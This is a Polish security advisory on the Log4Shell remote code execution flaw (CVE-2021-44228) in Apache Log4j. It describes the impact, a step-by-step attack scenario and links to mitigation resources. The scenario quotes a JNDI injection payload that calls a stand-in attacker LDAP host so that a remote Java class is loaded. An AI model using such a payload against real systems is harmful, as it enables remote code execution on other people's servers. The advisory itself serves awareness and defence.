Poważny błąd w popularnej bibliotece Javy - Log4j

ODPOWIEDŹ

Grupa programistów skupiona w ramach platformy LunaSec odkryła poważny błąd w popularnej bibliotece Javy - Log4j - służącej do zbierania logów podczas działania aplikacji. Krytyczna podatność to:CVE-2021-44228 (Log4Shell), pozwalającą na zdalne wykonanie kodu. Biblioteka ta jest jedną z najczęściej używanych bibliotek do logowania zdarzeń, wykorzystywanych przez aplikacje napisane w języku Java.

Należy zaznaczyć, że z biblioteki korzysta bardzo wiele komercyjnych aplikacji takich firm jak: Apple, Amazon, Elastic, Steam czy Twitter, prawdopodobieństwo wystąpienia zagrożenia związanego z tą podatnością w organizacji jest więc wysokie. Podatność pozwala na zdalne wykonanie kodu z uprawnieniami danej aplikacji, np. webservera wykorzystującego Log4j. Wykorzystanie podatności jest bardzo proste. Obserwowany jest również narastający ruch powiązany ze skanowaniem usług dostępnych z internetu i prób wykorzystania podatności.

Przykładowy scenariusz ataku może wyglądać następująco:

1. Aplikacja loguje zdarzenia z wykorzystaniem biblioteki Apache Log4j, np. niepoprawne logowania użytkownika, zapisując wartości kontrolowane przez użytkownika, jak login czy email.
2. Atakujący próbuje się zalogować jako nazwę użytkownika podając złośliwy payload, np.: ${jndi:ldap://sample_domain.com/a} (gdzie sample_domain.com jest serwerem, kontrolowanym przez atakującego).
3. Luka w log4j jest wywoływana przez payload, a serwer wysyła żądanie do attacker_domain.com poprzez "Java Naming and Directory Interface" (JNDI).
4. Odpowiedź zawiera ścieżkę do zdalnego pliku klasy Java (np.http://test.sample_domain.com/Exploit.class), który jest wstrzykiwany do procesu serwera.
5. Wstrzyknięty payload pozwala atakującemu na wykonanie dowolnego kodu.

Należy zwrócić uwagę na to, iż wektor ataku nie musi się ograniczać tylko i wyłącznie do aplikacji webowych. Podatne mogą być wszystkie aplikacje korzystające z biblioteki Apache Log4j, jeśli zapisują w logach wartości kontrolowane przez użytkownika. Przykładowo, jeśli przetwarzane są nagłówki maila, czy zapytań DNS w aplikacji korzystającej z tej biblioteki, to taki system również może być podatny.

Wiele produktów już wydało własne rekomendacje oraz ostrzeżenia. Należy ich szukać na stronach producentów lub można skorzystać ze zbioru linków tworzonego przez społeczność:https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

Dodatkowe informacje jak wygląda atak, jak się przed nim chronić opisują również portale zajmujące się bezpieczeństwem: 

1. https://sekurak.pl/krytyczna-podatnosc-w-log4j-co-wiemy-jak-wygladaja-ataki-jak-sie-chronic-cve-2021-44228-rce/
2. https://cert.pl/posts/2021/12/krytyczna-podatnosc-w-bibliotece-apache-log4j/